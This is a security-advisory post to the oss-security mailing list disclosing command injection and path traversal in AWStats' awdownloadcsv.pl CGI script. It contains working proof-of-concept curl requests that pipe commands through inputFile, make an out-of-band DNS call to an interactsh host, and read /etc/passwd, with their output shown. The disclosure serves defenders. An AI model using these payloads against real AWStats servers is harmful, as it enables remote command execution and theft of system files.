Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <Z2Y_rOJaVlLCYFBjgdkkl4SNaDAPnNTwxykLMSRBhRmA_lpIrjmLP4zrLhBwL1KHxJ465aMmWAEG4nTm5bHvY2o7KMUdoUJ-427OZLiHxDk=@vadersecurity.com>
Date: Sun, 08 Mar 2026 08:26:23 +0000
From: "christopher.downs" <christopher.downs@...ersecurity.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: AWStats awdownloadcsv.pl command injection and path traversal vulnerabilities

Evening,
Two vulnerabilities were identified in the AWStats CGI script awdownloadcsv.pl that may allow command injection and arbitrary file access.

Repository:
https://github.com/eldy/AWStats/tree/develop

Examples shown below are running locally in a Docker container for demonstration. 

Download functionality is disabled. The Default. 
my $ALLOWDOWNLOAD=0

#!/usr/bin/perl -w#------------------------------------------------------------------------------
# Free addition to AWStats Web Log Analyzer. Used to export the contents of
# sections of the Apache server log database to CSV for use in other tools.
# Works from command line or as a CGI.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
use CGI qw(:standard);

my $ALLOWDOWNLOAD=0;
----- SNIP -----

Issue 1: Command Injection

The "section" parameter appears to be incorporated into shell commands without proper sanitization. Injection of shell metacharacters such as "|" may allow an attacker to escape the intended command pipeline. 

Example request(s):

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|id&outputFile=/tmp/j.csv'uid=33(www-data) gid=33(www-data) groups=33(www-data)
vectorium-x[main] %

vectorium-x[main*] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|getent%20hosts%20d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun&outputFile=/tmp/j.csv'

206.189.156.69  d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
vectorium-x[main*] %

/tmp % interactsh-client -dns-only -o /tmp/interact_$(date +%s).interact
    _       __                       __       __
   (_)___  / /____  _________ ______/ /______/ /_
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/

projectdiscovery.io

[INF] Current interactsh version 1.3.0 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (A) from 66.185.115.247 at 2026-03-08 07:02:25

Issue 2: Path Traversal / Arbitrary File Read

The "inputFile" parameter is used directly in file operations without validation, allowing directory traversal.

Example code pattern:

if ($q->param("inputFile")) {
if ($inputFile eq '') { $inputFile = $q->param("inputFile"); }
}

open (IN, $inputFile) || die "cannot open $inputFile\n";

Example request:

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&outputFile=/tmp/pwnd.csv'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing,List,Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vectorium-x[main] %

/tmp/pwnd.csv written to disk:
vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=|cat%20/tmp/pwnd.csv&outputFile='daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
----- SNIP -----

Impact

Depending on deployment configuration, these issues may allow:

-   command execution
    

-   reading arbitrary files
    

-   writing attacker-controlled output files
    


Disclosure

The upstream developer was contacted previously regarding these issues. No response was received, so this notice is being sent to the oss-security list for awareness.

August 30th 2025
September 6th 2025

Thanks All --


Sent with Proton Mail secure email.
Content of type "text/html" skipped

Download attachment "publickey - christopher.downs@...ersecurity.com - 0x9776492D.asc" of type "application/pgp-keys" (3125 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (950 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.